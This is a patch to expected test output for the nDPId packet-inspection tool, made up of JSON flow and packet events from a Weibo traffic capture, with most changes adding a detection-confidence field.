+00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073334,"flow_last_seen":1463089073384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1463089073384,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/common\/font\/wbficon.woff?id=201605111746","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1463089073393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":159,"pkt_l4_len":125,"ts_msec":1463089073393,"pkt":"eJKcD6iOkDVu60UQCABFAACRAABAAEARtqHAqAEBwKgBaQA1RnMAfV+\/WFGBgAABAAMAAAAAAnUxA2ltZwZtb2JpbGUEc2luYQJjbgAAAQABwAwABQABAAAACQAZBWFkaW1nBGdzbGIIc2luYWVkZ2UDY29tAMAzAAUAAQAAAAoADQV3ZWlibwRncmlkwD7AWAABAAEAAAAvAATeSRxg"}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073286,"flow_last_seen":1463089073393,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1463089073393,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"u1.img.mobile.sina.cn","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.28.96"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073286,"flow_last_seen":1463089073393,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1463089073393,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"u1.img.mobile.sina.cn","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.28.96"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1463089073394,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1463089073394,"pkt":"kDVu60UQeJKcD6iOCABFAAA\/KDNAAEARjsDAqAFpwKgBAS4WADUAK\/dEyn0BAAABAAAAAAAAB2FjY291bnQFd2VpYm8DY29tAAABAAE="}
-00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"account.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"account.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1463089073394,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073394,"pkt":"kDVu60UQeJKcD6iOCABFAAA8VdhAAEAGKCnAqAFp3kkcYKUjAFC1h1\/eAAAAAKACchBUFAAAAgQFtAQCCAoAQQoGAAAAAAEDAwc="}
 00628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1463089073423,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"ts_msec":1463089073423,"pkt":"eJKcD6iOkDVu60UQCABFAACwAABAAEARtoLAqAEBwKgBaQA1oYgAnCOtK+iBgAABAAUAAAAAAmpzAXQGc2luYWpzAmNuAAABAAHADAAFAAEAAAA8AAcEd2NkbsARwCwABQABAAAAKQAVBnNpbmFqcwVjc2dsYgV0eGNkbsAYwD8ABQABAAAEEgAUCG40Y3N3aGszBWdjY2RuA25ldADAYAABAAEAAAADAARdvIb2wGAAAQABAAAAAwAEXbyG8Q=="}
-00760{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072885,"flow_last_seen":1463089073423,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1463089073423,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"js.t.sinajs.cn","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.246"}}
+00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072885,"flow_last_seen":1463089073423,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1463089073423,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"js.t.sinajs.cn","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.246"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1463089073424,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1463089073424,"pkt":"kDVu60UQeJKcD6iOCABFAAA4KDhAAEARjsLAqAFpwKgBAUGkADUAJAai81YBAAABAAAAAAAAAWMFd2VpYm8CY24AAAEAAQ=="}
-00739{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"c.weibo.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"c.weibo.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073424,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1463089073424,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073424,"pkt":"kDVu60UQeJKcD6iOCABFAAA8dN1AAEAGHxvAqAFpXbyG9ovjAFD5+n7QAAAAAKACchAf3wAAAgQFtAQCCAoAQQoNAAAAAAEDAwc="}
 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1463089073478,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"ts_msec":1463089073478,"pkt":"eJKcD6iOkDVu60UQCABFAACdAABAAEARtpXAqAEBwKgBaQA1yPAAiVtu8RCBgAABAAUAAAAAAWcGYWxpY2RuA2NvbQAAAQABwAwABQABAADy0wAXAWcGYWxpY2RuA2NvbQdkYW51b3lpwA7AKgABAAEAAAGzAAQvWUHlwCoAAQABAAABswAEL1lBx8AqAAEAAQAAAbMABC9ZQcbAKgABAAEAAAGzAAQvWUHk"}
-00749{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":306,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073478,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1463089073478,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"g.alicdn.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"47.89.65.229"}}
+00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":306,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073478,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1463089073478,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"g.alicdn.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"47.89.65.229"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1463089073479,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073479,"pkt":"kDVu60UQeJKcD6iOCABFAAA8KD5AAEARjrjAqAFpwKgBAcVlADUAKPnf1EwBAAABAAAAAAAABGRhdGEFd2VpYm8DY29tAAABAAE="}
-00743{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"data.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"data.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073479,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1463089073479,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073479,"pkt":"kDVu60UQeJKcD6iOCABFAAA8PQxAAEAGymDAqAFpL1lB5caLAbuG5TcXAAAAAKACchASAQAAAgQFtAQCCAoAQQobAAAAAAEDAwc="}
 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1463089073488,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"ts_msec":1463089073488,"pkt":"eJKcD6iOkDVu60UQCABFAABiAABAAEARttDAqAEBwKgBaQA10NoATp++kZuBgAABAAIAAAAAA2xvZwZtbXN0YXQDY29tAAABAAHADAAFAAEAAAIfAAoDbG9nA2dkc8AQwCwAAQABAAAAIwAEjM2uAQ=="}
-00751{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073488,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"log.mmstat.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"140.205.174.1"}}
+00777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":309,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073488,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"log.mmstat.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"140.205.174.1"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073488,"pkt":"kDVu60UQeJKcD6iOCABFAAA8K\/hAAEAGEeTAqAFpjM2uAbzgAbtP+SHlAAAAAKACchCeNwAAAgQFtAQCCAoAQQodAAAAAAEDAwc="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073488,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -146,95 +147,95 @@
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073537,"pkt":"kDVu60UQeJKcD6iOCABFAAA8abpAAEAG1CHAqAFpjM2uAbzkAbvb32OTAAAAAKACchDQkgAAAgQFtAQCCAoAQQopAAAAAAEDAwc="}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1463089073616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073616,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+OyanX1+fp+0aAS\/\/9YyQAAAgQFqAQCCAoDdg1LAEEKDQEDAwc="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1463089073616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089073616,"pkt":"kDVu60UQeJKcD6iOCABFAAA0dN5AAEAGHyLAqAFpXbyG9ovjAFD5+n7Rsmp19oAQAOWGdAAAAQEICgBBCj0Ddg1L"}
-00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073424,"flow_last_seen":1463089073616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1463089073616,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"js.t.sinajs.cn","url":"js.t.sinajs.cn\/t5\/register\/js\/v6\/pl\/base.js?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
+00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073424,"flow_last_seen":1463089073616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":99,"midstream":0,"ts_msec":1463089073616,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"js.t.sinajs.cn","url":"js.t.sinajs.cn\/t5\/register\/js\/v6\/pl\/base.js?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1463089073635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089073635,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGFnUvWUHlwKgBaQG7xos8arg3huU3GIASOQiHzQAAAgQFqAEBBAIBAwMJ"}
